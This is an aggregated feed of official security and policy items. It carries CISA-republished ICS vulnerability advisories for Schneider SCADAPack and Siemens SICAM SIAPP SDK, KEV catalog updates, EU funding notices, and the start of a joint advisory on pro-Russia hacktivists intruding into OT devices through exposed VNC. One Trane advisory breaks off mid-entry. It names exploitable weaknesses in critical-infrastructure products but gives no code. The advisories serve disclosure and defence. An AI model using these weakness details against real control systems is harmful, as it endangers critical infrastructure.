Schneider Electric is aware of a vulnerability in its SCADAPack™ x70 RTU products. The SCADAPack™ 47xi, SCADAPack™ 47x and SCADAPack™ 57x products are Remote Terminal Units that provide communication capabilities for remote monitoring and control. Failure to apply the remediations provided below may risk unauthorized access to your RTU, which could result in the possibility of denial of service and loss of confidentiality and integrity of the controller.

The following versions of Schneider Electric SCADAPack and RemoteConnect are affected:
• SCADAPack™ vers:generic/
• SCADAPack™ firmware vers:intdot/<9.12.2, 9.12.2
• RemoteConnect vers:generic/

CVSS v3: 9.8 | Vendor: Schneider Electric | Equipment: Schneider Electric SCADAPack and RemoteConnect | Vulnerabilities: Improper Check for Unusual or Exceptional Conditions

Background
Critical Infrastructure Sectors: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: France

Vulnerabilities
CVE-2026-0667
CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability that could cause arbitrary code execution, denial of service and loss of confidentiality & integrity when communicating over the Modbus TCP protocol.
Affected Products: Schneider Electric SCADAPack and RemoteConnect
Vendor: Schneider Electric
Product Version: SCADAPack™ 57x All Versions, RemoteConnect Versions prior to R3.4.2
Product Status: fixed, known_affected
Remediations
Vendor fix: Version R3.4.2 (Firmware version 9.12.2) of SCADAPack™ 47x and SCADAPack™ 47xi includes a fix for this vulnerability and is available for download here: https://www.se.com/ww/en/download/document/RemoteConnect/
Vendor fix: Version R3.4.2 of RemoteConnect includes a fix for this vulnerability and is available for download here: https://www.se.com/ww/en/download/document/RemoteConnect/
Mitigation: If customers choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit. Follow the information according to SCADAPack™ Security Guidelines in section 8.3 Secured Communication. Also, apply the following standard practices to reduce the risk of exploit:
• Set up network segmentation and implement the RTU firewall service to block all unauthorized access to services.
• Disable the logic debug service.
Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions
Metrics: CVSS v3.1 base score 9.8 (CRITICAL), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Acknowledgments
Schneider Electric CPCERT reported this vulnerability to CISA.

General Security Recommendations
We strongly recommend the following industry cybersecurity best practices.
* Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.
* Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.
* Place all controllers in locked cabinets and never leave them in the “Program” mode.
* Never connect programming software to any network other than the network intended for that device.
* Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.
* Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.
* Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.
* When remote access is required, use secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.
For more information refer to the Schneider Electric [Recommended Cybersecurity Best Practices](https://www.se.com/us/en/download/document/7EN52-0390/) document.

For More Information
This document provides an overview of the identified vulnerability or vulnerabilities and actions required to mitigate them. For more details and assistance on how to protect your installation, contact your local Schneider Electric representative or Schneider Electric Industrial Cybersecurity Services: https://www.se.com/ww/en/work/solutions/cybersecurity/. These organizations will be fully aware of this situation and can support you through the process.
For further information related to cybersecurity in Schneider Electric's products, visit the company's cybersecurity support portal page: https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp

LEGAL DISCLAIMER
THIS NOTIFICATION DOCUMENT, THE INFORMATION CONTAINED HEREIN, AND ANY MATERIALS LINKED FROM IT (COLLECTIVELY, THIS “NOTIFICATION”) ARE INTENDED TO HELP PROVIDE AN OVERVIEW OF THE IDENTIFIED SITUATION AND SUGGESTED MITIGATION ACTIONS, REMEDIATION, FIX, AND/OR GENERAL SECURITY RECOMMENDATIONS AND IS PROVIDED ON AN “AS-IS” BASIS WITHOUT WARRANTY OR GUARANTEE OF ANY KIND. SCHNEIDER ELECTRIC DISCLAIMS ALL WARRANTIES RELATING TO THIS NOTIFICATION, EITHER EXPRESS OR IMPLIED, INCLUDING WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. SCHNEIDER ELECTRIC MAKES NO WARRANTY THAT THE NOTIFICATION WILL RESOLVE THE IDENTIFIED SITUATION. IN NO EVENT SHALL SCHNEIDER ELECTRIC BE LIABLE FOR ANY DAMAGES OR LOSSES WHATSOEVER IN CONNECTION WITH THIS NOTIFICATION, INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF SCHNEIDER ELECTRIC HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. YOUR USE OF THIS NOTIFICATION IS AT YOUR OWN RISK, AND YOU ARE SOLELY LIABLE FOR ANY DAMAGES TO YOUR SYSTEMS OR ASSETS OR OTHER LOSSES THAT MAY RESULT FROM YOUR USE OF THIS NOTIFICATION. SCHNEIDER ELECTRIC RESERVES THE RIGHT TO UPDATE OR CHANGE THIS NOTIFICATION AT ANY TIME AND IN ITS SOLE DISCRETION.

About Schneider Electric
Schneider's purpose is to create Impact by empowering all to make the most of our energy and resources, bridging progress and sustainability for all. We call this Life Is On. Our mission is to be the trusted partner in Sustainability and Efficiency. We are a global industrial technology leader bringing world-leading expertise in electrification, automation and digitization to smart industries, resilient infrastructure, future-proof data centers, intelligent buildings, and intuitive homes. Anchored by our deep domain expertise, we provide integrated end-to-end lifecycle AI-enabled Industrial IoT solutions with connected products, automation, software and services, delivering digital twins to enable profitable growth for our customers. We are a people company with an ecosystem of 150,000 colleagues and more than a million partners operating in over 100 countries to ensure proximity to our customers and stakeholders. We embrace diversity and inclusion in everything we do, guided by our meaningful purpose of a sustainable future for all. www.se.com

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.
• Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolate them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Schneider Electric CPCERT SEVD-2026-041-01 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Schneider Electric CPCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-02-10
• 2026-02-10, revision 1: Original Release
• 2026-03-17, revision 2: Initial CISA Republication of Schneider Electric CPCERT SEVD-2026-041-01 advisory

Siemens SICAM SIAPP SDK
Governance & Regulation | CISA Advisories | 12 days ago

Summary
The SICAM SIAPP SDK contains multiple vulnerabilities that could allow an attacker to disrupt the customer-developed SIAPP or its simulation environment. Potential impacts include denial of service within the SIAPP, corruption of SIAPP data, or exploitation of the simulation environment. These vulnerabilities are only exploitable if the API is used improperly or hardening measures are not applied. Siemens has released a new version of SICAM SIAPP SDK and recommends updating to the latest version.

The following versions of Siemens SICAM SIAPP SDK are affected:
• SICAM SIAPP SDK vers:intdot/<2.1.7

CVSS v3: 7.4 | Vendor: Siemens | Equipment: Siemens SICAM SIAPP SDK | Vulnerabilities: Out-of-bounds Write, Stack-based Buffer Overflow, Improper Handling of Length Parameter Inconsistency, External Control of File Name or Path

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities
CVE-2026-25569
An out-of-bounds write vulnerability exists in SICAM SIAPP SDK. This could allow an attacker to write data beyond the intended buffer, potentially leading to denial of service or arbitrary code execution.
Affected Products: Siemens SICAM SIAPP SDK
Vendor: Siemens
Product Version: SICAM SIAPP SDK
Product Status: known_affected
Remediations
Vendor fix: Update to V2.1.7 or later
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS v3.1 base score 7.4 (HIGH), vector string CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2026-25570
The SICAM SIAPP SDK does not perform checks on input values, potentially resulting in a stack overflow. This could allow an attacker to perform code execution and denial of service.
Affected Products: Siemens SICAM SIAPP SDK
Vendor: Siemens
Product Version: SICAM SIAPP SDK
Product Status: known_affected
Remediations
Vendor fix: Update to V2.1.7 or later
Relevant CWE: CWE-121 Stack-based Buffer Overflow
Metrics: CVSS v3.1 base score 7.4 (HIGH), vector string CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2026-25571
The SICAM SIAPP SDK client component does not enforce maximum length checks on certain variables before use. This could allow an attacker to send an oversized input that could trigger a stack overflow, crashing the process and potentially causing denial of service.
Affected Products: Siemens SICAM SIAPP SDK
Vendor: Siemens
Product Version: SICAM SIAPP SDK
Product Status: known_affected
Remediations
Vendor fix: Update to V2.1.7 or later
Relevant CWE: CWE-130 Improper Handling of Length Parameter Inconsistency
Metrics: CVSS v3.1 base score 5.1 (MEDIUM), vector string CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2026-25572
The SICAM SIAPP SDK server component does not enforce maximum length checks on certain variables before use. This could allow an attacker to send an oversized input that could trigger a stack overflow, crashing the process and potentially causing denial of service.
Affected Products: Siemens SICAM SIAPP SDK
Vendor: Siemens
Product Version: SICAM SIAPP SDK
Product Status: known_affected
Remediations
Vendor fix: Update to V2.1.7 or later
Relevant CWE: CWE-130 Improper Handling of Length Parameter Inconsistency
Metrics: CVSS v3.1 base score 5.1 (MEDIUM), vector string CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2026-25573
The affected application builds shell commands with caller-provided strings and executes them. An attacker could influence the executed command, potentially resulting in command injection and full system compromise.
Affected Products: Siemens SICAM SIAPP SDK
Vendor: Siemens
Product Version: SICAM SIAPP SDK
Product Status: known_affected
Remediations
Vendor fix: Update to V2.1.7 or later
Relevant CWE: CWE-73 External Control of File Name or Path
Metrics: CVSS v3.1 base score 7.4 (HIGH), vector string CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2026-25605
The affected application performs file deletion without properly validating the file path or target. An attacker could delete files or sockets that the affected process has permission to remove, potentially resulting in denial of service or service disruption.
Affected Products: Siemens SICAM SIAPP SDK
Vendor: Siemens
Product Version: SICAM SIAPP SDK
Product Status: known_affected
Remediations
Vendor fix: Update to V2.1.7 or later
Relevant CWE: CWE-73 External Control of File Name or Path
Metrics: CVSS v3.1 base score 6.7 (MEDIUM), vector string CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

Acknowledgments
Siemens ProductCERT reported these vulnerabilities to CISA. Maxime Rossi Bellom of Secmate reported these vulnerabilities to Siemens.

General Recommendations
Operators of critical power systems (e.g. TSOs or DSOs) worldwide are usually required by regulations to build resilience into the power grids by applying multi-level redundant secondary protection schemes. It is therefore recommended that the operators check whether appropriate resilient protection measures are in place. The risk of cyber incidents impacting the grid's reliability can thus be minimized by virtue of the grid design.
Siemens strongly recommends applying the provided security updates using the corresponding tooling and documented procedures made available with the product. If supported by the product, an automated means to apply the security updates across multiple product instances may be used. Siemens strongly recommends prior validation of any security update before it is applied, and supervision by trained staff of the update process in the target environment.
As a general security measure, Siemens strongly recommends protecting network access with appropriate mechanisms (e.g. firewalls, segmentation, VPN). It is advised to configure the environment according to our operational guidelines in order to run the devices in a protected IT environment. Recommended security guidelines can be found at: https://www.siemens.com/gridsecurity

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.
• Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolate them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-903736 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-03-10
• 2026-03-10, revision 1: Publication Date
• 2026-03-17, revision 2: Initial CISA Republication of Siemens ProductCERT SSA-903736 advisory

Equipment for smart European cable systems - Works
Governance & Regulation | EC Digital Strategy | 12 days ago

Equipment for smart European cable systems - Works
Tue, 03/17/2026 - 08:45
Opening: 17 March 2026
Closing: 30 June 2026
This call supports the upgrade of existing submarine telecommunications/digital infrastructures to “smart capabilities” enabling applications that monitor them as well as other surrounding critical infrastructures (e.g. power cables, pipelines, etc.) and/or their vicinity.
Main link: https://ec.europa.eu/info/funding-tenders/opportunities/portal/screen/opportuni…
Related topics: Digital connectivity, Connecting Europe Facility, Funding for Digital

Backbone connectivity for Digital Global Gateways - Studies
Governance & Regulation | EC Digital Strategy | 12 days ago

Tue, 03/17/2026 - 08:19
Opening: 17 March 2026
Closing: 30 June 2026

This call for proposals will fund studies related to the deployment/significant upgrade of backbone networks that address risks, vulnerabilities and dependencies in the EU backbone infrastructure.

Main link: https://ec.europa.eu/info/funding-tenders/opportunities/portal/screen/opportuni…

Related topics: Digital connectivity, Connecting Europe Facility, Funding for Digital

CISA Adds One Known Exploited Vulnerability to Catalog
Governance & Regulation | CISA Advisories | 13 days ago

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2025-47813 Wing FTP Server Information Disclosure Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Open EU Foundry status granted to innovative chiplet facility
Governance & Regulation | EC Digital Strategy | 13 days ago

Mon, 03/16/2026 - 10:40

The Commission has granted the Open EU Foundry (OEF) status to Silicon Box in Novara, Italy.

Under the European Chips Act, the OEF status is granted to new or upgraded innovative semiconductor manufacturing facilities. The status provides benefits to semiconductor facilities including administrative support, faster construction approvals and priority access to pilot lines under the Chips for Europe Initiative. This helps deepen European semiconductor supply chain resilience and boost innovation.

Silicon Box’s project is a significant milestone in strengthening Europe’s semiconductor industry through its new advanced semiconductor packaging and testing facility. The facility will integrate multiple dies or chiplets (small, modular semiconductor blocks that perform specific functions) into a single package, effectively creating a multi-chip module that behaves like a single chip, using panel level packaging. Panel level packaging uses a more efficient large-panel approach to packaging, enabling higher output and lower cost compared to traditional methods in the final stage of the chip making process. The facility will also test chips at panel level, grouping multiple chiplets into a single panel, enabling more comprehensive quality verification before final assembly.

The project will provide an important base in Europe for developing innovative technologies, products and system solutions for the semiconductors key to powering AI, electric and autonomous vehicles, data centres, as well as supercomputing applications. The plant is expected to reach full capacity in 2033.

This OEF status recognition follows four semiconductor projects across the EU which have previously been awarded OEF or IPF (integrated production facility) status in October 2025:

- ESMC in Germany (OEF)
- Ams-OSRAM in Austria (IPF)
- Infineon Technologies Dresden in Germany (IPF)
- STMicroelectronics in Italy

The decision to grant OEF follows the Commission state aid decision concerning Silicon Box.

Related topics: Advanced Digital Technologies, Electronics, Chips Act, Semiconductors

CISA Adds Two Known Exploited Vulnerabilities to Catalog
Governance & Regulation | CISA Advisories | 16 days ago

CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2026-3909 Google Skia Out-of-Bounds Write Vulnerability
- CVE-2026-3910 Google Chromium V8 Unspecified Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Trane Tracer SC, Tracer SC+, and Tracer Concierge
Governance & Regulation | CISA Advisories | 17 days ago

Summary

Successful exploitation of these vulnerabilities could allow an attacker to disclose sensitive information, execute arbitrary commands, or perform a denial-of-service on the product.

The following versions of Trane Tracer SC, Tracer SC+, and Tracer Concierge are affected:

- Tracer SC
- Tracer SC+
- Tracer Concierge

CVSS v3: 8.1
Vendor: Trane
Equipment: Trane Tracer SC, Tracer SC+, and Tracer Concierge
Vulnerabilities: Use of a Broken or Risky Cryptographic Algorithm, Memory Allocation with Excessive Size Value, Missing Authorization, Use of Hard-coded Credentials, Use of Hard-coded, Security-relevant Constants

Background

Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Ireland

Vulnerabilities

CVE-2026-28252: A Use of a Broken or Risky Cryptographic Algorithm vulnerability in Trane Tracer SC, Tracer SC+, and Tracer Concierge could allow an attacker to bypass authentication and gain root-level access to the device.

Affected Products: Trane Tracer SC, Tracer SC+, and Tracer Concierge
Vendor: Trane
Product Version: Trane Tracer SC:

Apply AI webinars sectoral deep dive - Agrifood, climate & environment
Governance & Regulation | EC Digital Strategy | 24 days ago

Thu, 03/05/2026 - 14:30
19 March 2026

This session focuses on how the Commission, together with the private sector, aims to accelerate AI adoption across the agrifood sector, as well as the intersection between AI, climate and environment. This is part of a series of Apply AI thematic webinars.

Join the live stream on our YouTube channel to find out how farmers, industry, researchers and other stakeholders can contribute to shaping priorities for Europe’s agrifood, climate and environment ecosystems. Engage in the conversation by submitting questions in advance or during the session via Slido.

Agenda

- 14:00 - 14:45 (CET) Apply AI Agrifood
- 14:45 - 15:00 (CET) Short break
- 15:00 - 15:45 (CET) Apply AI Climate & Environment

Download the slides for both sessions below.

Moderator

- Andrea Hak, Stakeholder Communication Expert at the AI Office, DG CONNECT

Speakers - Agrifood

- Pierluigi Londero, Head of Unit Data Governance, DG AGRI
- Doris Marquardt, Programme Officer EU Policies, Contact person for Agriculture in the DG, DG CONNECT

Speakers - Climate & Environment

- Tsitlakidis Charalampos, Head of Sector, Destination Earth, DG CONNECT
- Irina Sandu, Director of Destination Earth (DestinE), European Centre for Medium-Range Weather Forecasts (ECMWF)

Agrifood

The webinar will discuss how the Commission aims to accelerate AI adoption across the agrifood sector and translate innovation into impact on the ground, enhancing sectoral competitiveness and public goods. Among others, a marketplace for AI-based solutions for the agri-food sector will be introduced and funding will be devoted to capacity building in the development of agriculture-specific foundation models (e.g., LLMs).

AI is already reshaping agricultural production and can transform the way food is produced, benefiting the environment, climate and people. AI supports farmers, for instance through AI-driven advisory tools and handy applications that turn data into tailored recommendations. These help producers to make better and faster decisions that account for local conditions and increase resource efficiency (e.g. saving water) and effectiveness. A new wave of opportunities is emerging, boosting precision farming, powering robots, and smartening machinery for field work. AI can also contribute to reducing reporting obligations and other administrative burdens.

Climate & Environment

AI has a long track record in environmental monitoring, forecasting, and Earth observation. It can enhance early-warning systems and aid disaster response as well as decision-making for resilience and climate preparedness. Ground-breaking initiatives such as Destination Earth provide high-resolution and interactive simulations with unprecedented predictive power through AI-driven applications.

Downloads

- Apply AI Climate & Environment (PDF)

Related topics: Creating a digital society, Environment, Smart and Sustainable Communities, Artificial intelligence

Commission holds first meeting of Special Panel on child safety online
Governance & Regulation | EC Digital Strategy | 24 days ago

Thu, 03/05/2026 - 08:08

European Commission President Ursula von der Leyen hosted the first meeting of the Special Panel on child safety online.

The panel, announced in the 2025 State of the Union address, will provide expert recommendations to better protect and empower children online and will explore the need for potential harmonised age restrictions to access social media.

President Ursula von der Leyen said:

"For decades, we have made the real world safer for children and we must do the same in the digital world. The positive opportunities that technology offers cannot come at the cost of their safety, health or happiness. In Europe, tech platforms already have a responsibility to ensure the safety of users and we will continue to ensure they do so. But we must also do more to protect and empower our young people online. That is why I have convened this panel: to forge a strong, realistic, European approach to keep our children safe in the digital age."

Read the full press release and find further information about the special panel on child safety online.

Related to child safety online, you can also read more about:

- the Digital Services Act (DSA) and its Guidelines on the protection of minors
- the Safer Internet Centres under the Better Internet for Kids Strategy (BIK+)
- the Cyberbullying Action Plan
- the EU Age Verification solution
- the Communication on a comprehensive approach to mental health
- the EU rules to combat child sexual abuse online

Related topics: Better Internet for Children, Strengthening trust and security, Online platforms and e-commerce

Commission seeks feedback for draft guidance to assist companies in applying the Cyber Resilience Act
Governance & Regulation | EC Digital Strategy | 25 days ago

Wed, 03/04/2026 - 09:10
Opening: 03 March 2026
Closing: 31 March 2026

The draft guidance clarifies the obligations and the scope of the rules with a particular focus on facilitating compliance by microenterprises and small and medium-sized enterprises.

Main link: https://ec.europa.eu/info/law/better-regulation/have-your-say/initiatives/16959…

Related topics: Cybersecurity

Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure
Governance & Regulation | US-CERT Alerts | 113 days ago

Summary

Note: This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology and European Cybercrime Centre’s (EC3) Operation Eastwood, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental Protection Agency (EPA), and EC3 shared information about cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States and globally.

FBI, CISA, National Security Agency (NSA), and the following partners (hereafter referred to as “the authoring organizations”) are releasing this joint advisory on the targeting of critical infrastructure by pro-Russia hacktivists:

- U.S. Department of Energy (DOE)
- U.S. Environmental Protection Agency (EPA)
- U.S. Department of Defense Cyber Crime Center (DC3)
- Europol European Cybercrime Centre (EC3)
- EUROJUST – European Union Agency for Criminal Justice Cooperation
- Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)
- Canadian Centre for Cyber Security (Cyber Centre)
- Canadian Security Intelligence Service (CSIS)
- Czech Republic Military Intelligence (VZ)
- Czech Republic National Cyber and Information Security Agency (NÚKIB)
- Czech Republic National Centre Against Terrorism, Extremism, and Cyber Crime (NCTEKK)
- French National Cybercrime Unit – Gendarmerie Nationale (UNC)
- French National Jurisdiction for the Fight Against Organized Crime (JUNALCO)
- German Federal Office for Information Security (BSI)
- Italian State Police (PS)
- Latvian State Police (VP)
- Lithuanian Criminal Police Bureau (LKPB)
- New Zealand National Cyber Security Centre (NCSC-NZ)
- Romanian National Police (PR)
- Spanish Civil Guard (GC)
- Spanish National Police (CNP)
- Swedish Polisen (SC3)
- United Kingdom National Cyber Security Centre (NCSC-UK)

The authoring organizations assess pro-Russia hacktivist groups are conducting less sophisticated, lower-impact attacks against critical infrastructure entities, compared to advanced persistent threat (APT) groups. These attacks use minimally secured, internet-facing virtual network computing (VNC) connections to infiltrate (or gain access to) OT control devices within critical infrastructure systems. Pro-Russia hacktivist groups—Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16), Sector16, and affiliated groups—are capitalizing on the widespread prevalence of accessible VNC devices to execute attacks against critical infrastructure entities, resulting in varying degrees of impact, including physical damage. Targeted sectors include Water and Wastewater Systems, Food and Agriculture, and Energy.

The authoring organizations encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of pro-Russia hacktivist-related incidents. For additional information on Russian state-sponsored malicious cyber activity, see CISA’s Russia Threat Overview and Advisories webpage.

Download the PDF version of this report: Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure (PDF, 1.53 MB)

Background and Development of Pro-Russia Hacktivist Groups

Over the past several years, the authoring organizations have observed pro-Russia hacktivist groups conducting cyber operations against numerous organizations and critical infrastructure sectors worldwide. The escalation of the Russia-Ukraine conflict in 2022 significantly increased the number of these pro-Russia groups. Consisting of individuals who support Russia’s agenda but lack direct governmental ties, most of these groups target Ukrainian and allied infrastructure. However, among the increasing number of groups, some appear to have associations with the Russian state through direct or indirect support.

Cyber Army of Russia Reborn

The authoring organizations assess that the Russian General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455—tracked in the cybersecurity community under several names (see Appendix B: Additional Designators Used for Cited Groups)—is likely responsible for supporting the creation of CARR—also known as “The People’s Cyber Army of Russia”—in late February or early March of 2022. Actors suspected to be from GRU unit 74455 likely funded the tools CARR threat actors used to conduct distributed denial-of-service (DDoS) attacks through at least September 2024.

In April 2022, the group began using a new Telegram channel featuring the name “CyberArmyofRussia_Reborn” to organize and plan group actions. The channel creators recruited actors to use CARR as an unattributable platform for conducting cyber activities beneath the level of an APT, aimed at deterring anti-Russia rhetoric. CARR threat actors presented themselves as a group of pro-Russia hacktivists supporting Russia’s stance on the Ukrainian conflict, and they soon began claiming responsibility for DDoS attacks against the U.S. and Europe for supporting Ukraine. CARR documented these actions through embellished images and videos shared on their social media channels, promoting Russian ideology, disseminating talking points, and publicizing leaked information from hacks attributed to Russian state threat actors.

In late 2023, CARR expanded their operations to include attacks on industrial control systems (ICS), claiming an intrusion against a European wastewater treatment facility in October 2023. In November 2023, CARR targeted human-machine interface (HMI) devices, claiming intrusions at two U.S. dairy farms. The authoring organizations assess that by late September 2024, CARR channel administrators became dissatisfied with the level of support and funding provided by the GRU. This dissatisfaction led CARR administrators and an administrator from another hacktivist group, NoName057(16), to create the Z-Pentest group, employing the same tactics, techniques, and procedures (TTPs) as CARR but separate from GRU involvement.

NoName057(16)

The authoring organizations assess that the Center for the Study and Network Monitoring of the Youth Environment (CISM), established on behalf of the Kremlin, created NoName057(16) as a covert project within the organization. Senior executives and employees within CISM developed and customized the NoName057(16) proprietary DDoS tool DDoSia, paid for the group’s network infrastructure, served as administrators on NoName057(16) Telegram channels, and selected DDoS targets.

Active since March 2022, NoName057(16) has conducted frequent DDoS attacks against government and private sector entities in North Atlantic Treaty Organization (NATO) member states and other European countries perceived as hostile to Russian geopolitical interests. The group operates primarily through Telegram channels and used GitHub, alongside various websites and repositories, to host DDoSia and share materials and TTPs with their followers.

In 2024, NoName057(16) began collaborating closely with other pro-Russia hacktivist groups, operating a joint chat with CARR by mid-2024. In July 2024, NoName057(16) jointly claimed responsibility with CARR for an alleged intrusion against OT assets in the U.S. The high degree of cooperation with CARR likely contributed to the formation of Z-Pentest, which is composed of actors and administrators from both teams, in September 2024.

Z-Pentest

Established in September 2024, Z-Pentest is composed of members from CARR and NoName057(16). The group specializes in OT intrusion operations targeting globally dispersed critical infrastructure entities. Additionally, the group uses “hack and leak” operations and defacement attacks to draw attention to their pro-Russia messaging. Unlike other pro-Russia hacktivist groups, Z-Pentest largely avoids DDoS activities, claiming OT intrusions as attempts to garner more attention from the media.

